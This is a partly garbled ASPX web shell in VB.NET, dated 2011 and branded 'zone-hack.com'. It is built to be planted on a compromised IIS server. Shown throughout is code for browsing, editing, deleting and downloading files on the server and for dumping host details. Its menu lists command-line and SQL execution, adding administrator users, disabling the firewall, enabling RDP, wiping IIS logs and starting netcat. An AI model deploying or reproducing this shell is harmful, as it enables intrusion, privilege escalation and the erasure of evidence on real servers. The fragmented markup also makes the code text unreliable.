%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <% if request.QueryString("action")="down" and session("XXx_Death_xXX")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim hu as string = request.QueryString("action") if hu="cmd" then TITLE="CMD.NET" elseif hu="sqlrootkit" then TITLE="zone-hack.com.NET" elseif hu="clonetime" then TITLE="Clone Time" elseif hu="information" then TITLE="Web Server Info" elseif hu="goto" then TITLE="aspx zhc shell by xxx_death_xxx::2011" else TITLE=request.ServerVariables("HTTP_HOST") end if %>

Current Directory: <%=url%>
| Action: | New | Upload | title="Go to this file's directory"> Index Root | Exit |
| Drive: | <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> |
| Tools: | SQL Command | Command Line | System Information |
| Admin Tricks: | Add User | Add User To Administrators Group | Disable Windows Firewall | Enable RDP | Wipe IIS Logs |
| Silentz's Tricks: | Start NC |
| Name | Size | Last Modified | Action |
| <% hupo= " | |||
| |Parent Directory| | |||
| " & xdir.name & " | " response.Write(hupo) response.Write("<dir> | ") response.Write("" & Directory.GetLastWriteTime(url & xdir.name) & " | ") hupo="Cut" & "|Copy|Del | " response.Write(hupo) response.Write("
| <% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write(" | |||
| " & xfile.name & " | " response.Write(hupo) hupo="" & GetSize(xfile.length) & " | " response.Write(hupo) response.Write("" & file.GetLastWriteTime(url & xfile.name) & " | ") hupo="Edit|Cut|Copy|Rename|Download|Del | " response.Write(hupo) response.Write("
[ System information ]
| Web Server Information | |
| Server IP | <%=request.ServerVariables("LOCAL_ADDR")%> |
| Machine Name | <%=Environment.MachineName%> |
| Network Name | <%=Environment.UserDomainName.ToString()%> |
| User Name in this Process | <%=Environment.UserName%> |
| OS Version | <%=Environment.OSVersion.ToString()%> |
| Started Time | <%=GetStartedTime(Environment.Tickcount)%> Hours |
| System Time | <%=now%> |
| IIS Version | <%=request.ServerVariables("SERVER_SOFTWARE")%> |
| HTTPS | <%=request.ServerVariables("HTTPS")%> |
| PATH_INFO | <%=request.ServerVariables("PATH_INFO")%> |
| PATH_TRANSLATED | <%=request.ServerVariables("PATH_TRANSLATED")%> |
| SERVER_PORT | <%=request.ServerVariables("SERVER_PORT")%> |
| SeesionID | <%=Session.SessionID%> |
| Client Infomation | |
| Client Proxy | <%=CP%> |
| Client IP | <%=CIP%> |
| User | <%=request.ServerVariables("HTTP_USER_AGENT")%> |
<% case "logout" session.Abandon() response.Write("